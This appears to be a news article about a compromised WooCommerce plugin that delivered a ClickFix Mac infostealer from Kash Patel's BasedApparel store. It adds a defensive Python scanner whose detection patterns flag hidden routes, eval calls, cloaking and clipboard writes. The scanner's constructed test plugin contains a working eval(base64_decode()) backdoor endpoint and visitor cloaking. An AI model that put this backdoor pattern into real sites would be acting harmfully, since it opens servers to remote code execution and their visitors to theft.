Malicious WordPress Plugin Evaded 5 Endpoint Security Products on Kash Patel's Site
A single malicious plugin inside a WordPress e-commerce site evaded detection by five enterprise security products at the same time — CrowdStrike, SentinelOne, Trend Micro, Symantec, and Malwarebytes — before delivering a credential-stealing payload to visitors. That is the structural fact at the center of a breach that hit Kash Patel's BasedApparel.com storefront, and it is the reason security teams should care beyond the political entry point.
The attack itself used a known technique called ClickFix, in which a website displays a fake security prompt and tricks users into pasting a command into their own terminal; the command installs malware rather than completing any verification. Microsoft documented the method in May 2026, noting it had been pervasive since February, using fake CAPTCHA and Cloudflare overlays to get users to run encoded commands on their own machines. PCMag verified the attack on a live MacBook and confirmed it worked exactly as described.
What was new about the BasedApparel case was not the technique. It was the delivery vehicle: a single compromised plugin inside the WooCommerce store, installed by whoever had previously accessed the site's backend. The plugin registered a hidden command-and-control endpoint and served different content to different visitors (cloaking), and because all of that ran on the web server rather than on any visitor's Mac, endpoint software that monitors behavior at the device level had nothing to inspect until the victim pasted the command themselves. A security researcher who goes by WifiRumHam identified both the malicious plugin and the simultaneous miss across five enterprise security products. The same researcher found a separate payment card skimmer embedded in the checkout page, Straight Arrow News reported.
The endpoint security miss is the part that should concern every organization running WordPress or WooCommerce. WordPress powers roughly 40 percent of all websites, and WooCommerce accounts for a substantial share of those that run online stores. Plugin vulnerabilities and malicious plugin insertions are a documented pattern in WordPress security research; the specific approach of compromising a store's backend to install a plugin that then serves different content to visitors has appeared in multiple campaigns, not only in this case. Plugins operate in the application layer, inside the website itself rather than on the visitor's device. That lets them serve different content to different users, inject page JavaScript that writes a command to the visitor's clipboard, and register hidden API endpoints without endpoint software at the device level ever registering behavior it recognizes as malicious. Enterprise security products catch malware that executes on a machine. They do not catch a compromised plugin that alters what the browser displays or what ends up on the clipboard; their first chance comes only after the victim has run the pasted command. That gap is structural, not incidental, and the controls that cover it live on the server side: a plugin inventory, file-integrity monitoring of wp-content/plugins, and review of any plugin nobody remembers installing.
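A server-side check a WooCommerce operator can run today, since the endpoint products in the article had nothing to inspect. This is an added illustration, not code from the incident or from any of the products named: a heuristic triage of plugin source that scores the indicators the two paragraphs above describe (hidden REST route registration, dynamic code execution, visitor cloaking by User-Agent or address, and injected clipboard writes), and that decodes `base64_decode('...')` literals so an obfuscated second layer is scanned too. The patterns, weights and threshold are assumptions chosen for the example, and both plugin samples are constructed here, not the real malicious plugin.

```python
"""Heuristic triage of WordPress/WooCommerce plugin source.

Added illustration, not code from the incident. Indicator patterns, weights and
the threshold are assumptions for this example; tune them to your own
false-positive tolerance. Samples at the bottom are constructed."""
import base64
import binascii
import os
import re
from dataclasses import dataclass, field

# (indicator name, regex, weight). Weights are illustrative assumptions.
INDICATORS = [
    ("rest_route", re.compile(r"register_rest_route\s*\("), 2),
    ("dynamic_exec", re.compile(r"\b(?:eval|create_function)\s*\(|base64_decode\s*\("), 3),
    ("ua_cloaking", re.compile(r"HTTP_USER_AGENT|REMOTE_ADDR|wp_is_mobile\s*\("), 2),
    ("bot_filter", re.compile(r"googlebot|bingbot|crawler|headless", re.I), 1),
    ("clipboard_write", re.compile(r"navigator\.clipboard\.writeText|execCommand\s*\(\s*['\"]copy", re.I), 3),
    ("fake_verify", re.compile(r"verify you are human|cloudflare|captcha", re.I), 1),
    ("footer_inject", re.compile(r"add_action\s*\(\s*['\"](?:wp_footer|wp_head)['\"]"), 1),
]
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


@dataclass
class Finding:
    path: str
    score: int = 0
    hits: dict = field(default_factory=dict)


def decode_embedded(source: str) -> list:
    """Decode base64_decode('...') literals so obfuscated payloads get scanned as well."""
    layers = []
    for m in B64_LITERAL.finditer(source):
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return layers


def scan_source(path: str, source: str) -> Finding:
    """Score one file: raw source plus every decoded base64 layer found in it."""
    finding = Finding(path)
    decoded = decode_embedded(source)
    for text in [source, *decoded]:
        for name, pattern, _ in INDICATORS:
            n = len(pattern.findall(text))
            if n:
                finding.hits[name] = finding.hits.get(name, 0) + n
    finding.score = sum(w for name, _, w in INDICATORS if name in finding.hits)
    if decoded:
        finding.hits["obfuscated_layer"] = len(decoded)
        finding.score += 2
    # Cloaking next to a hidden route or a clipboard write is the plugin-delivered ClickFix shape.
    if "ua_cloaking" in finding.hits and ("rest_route" in finding.hits or "clipboard_write" in finding.hits):
        finding.score += 3
    return finding


def verdict(finding: Finding, threshold: int = 6) -> str:
    return "suspicious" if finding.score >= threshold else "clean"


def scan_plugin_dir(root: str) -> list:
    """Walk wp-content/plugins (or any tree) and triage every .php/.js file, worst first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith((".php", ".js")):
                p = os.path.join(dirpath, f)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    findings.append(scan_source(p, fh.read()))
    return sorted(findings, key=lambda x: x.score, reverse=True)


# Constructed samples (not the real plugin). The injected "command" is a harmless placeholder.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Shipping Estimate (constructed benign sample) */
add_action('rest_api_init', function () {
    register_rest_route('shipping/v1', '/estimate', [
        'methods' => 'GET', 'callback' => 'shipping_estimate',
        'permission_callback' => '__return_true',
    ]);
});
function shipping_estimate($req) { return rest_ensure_response(['days' => 3]); }
"""
_PAYLOAD_JS = ('<script>document.body.insertAdjacentHTML("beforeend",'
               '"<div>Verify you are human</div>");'
               'navigator.clipboard.writeText("echo placeholder");</script>')
MALICIOUS_PLUGIN = """<?php
/* Plugin Name: WC Cache Helper (constructed malicious sample) */
add_action('rest_api_init', function () {
    register_rest_route('wc-cache/v1', '/ping', [
        'methods' => 'POST', 'callback' => 'wc_cache_ping',
        'permission_callback' => '__return_true',
    ]);
});
function wc_cache_ping($req) { return eval(base64_decode($req['d'])); }
add_action('wp_footer', function () {
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (preg_match('/googlebot|bingbot/i', $ua) || strpos($ua, 'Macintosh') === false) { return; }
    echo base64_decode('%s');
});
""" % base64.b64encode(_PAYLOAD_JS.encode()).decode()

if __name__ == "__main__":
    for name, src in (("benign.php", BENIGN_PLUGIN), ("malicious.php", MALICIOUS_PLUGIN)):
        f = scan_source(name, src)
        print(f"{name}: {verdict(f)} score={f.score} hits={f.hits}")
```

Run it against a copy of wp-content/plugins with `scan_plugin_dir(...)` and read the top of the list by hand; the point of the base64 layer is that a plugin whose visible PHP looks like a cache helper still surfaces when its decoded footer output contains a clipboard write and a "verify you are human" overlay. The benign sample scores only for its legitimate REST route and stays under the threshold; the constructed malicious sample trips the cloaking-plus-route combination and the obfuscation bonus.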
Patel's site was distributing malware for at least a day before going offline on May 22, TechCrunch reported. As of publication, the FBI had not announced an investigation into the malware distribution. The bureau told Straight Arrow News that Patel had divested from any interest in Based Apparel before his confirmation as director and does not profit from site sales. Based Apparel did not respond to multiple requests for comment. Patel himself has not publicly addressed the incident.
The infostealer specifically targeted Mac users with cryptocurrency holdings, according to WifiRumHam's analysis: it collected login credentials and cookies from more than 200 crypto browser extensions, along with Safari data and passwords from the Mac system keychain. The payload sample on VirusTotal was flagged by 27 antivirus engines at the time of testing, so the stealer itself was recognizable once it ran; what the five endpoint products missed was the delivery. The server receiving the stolen data was registered to monterushy[.]com.
The site had prior security problems. In late March, the Iranian-linked hacker group Handala published more than 300 emails from Patel's personal Gmail inbox, including family photos and his resume.
The question the FBI has not answered is what it is doing about this. A bureau spokesperson declined to confirm an investigation. That is not unusual in early stages of a cyber incident, but it leaves open whether this is being treated as a criminal matter, a national security matter, or something else. The site remains offline with a holding page that promises a return "bolder than ever."
The supply chain that made the attack possible is not unique to BasedApparel. The plugin attack surface and the structural detection gap run through millions of WooCommerce stores. The malicious plugin did not rely on a zero-day; it followed a known pattern of WordPress plugin compromise documented in security research for years. The reason five enterprise products missed it simultaneously is not a mystery: they are not designed to catch it. Who, if anyone, is working to close that gap is the question the security industry has not yet answered.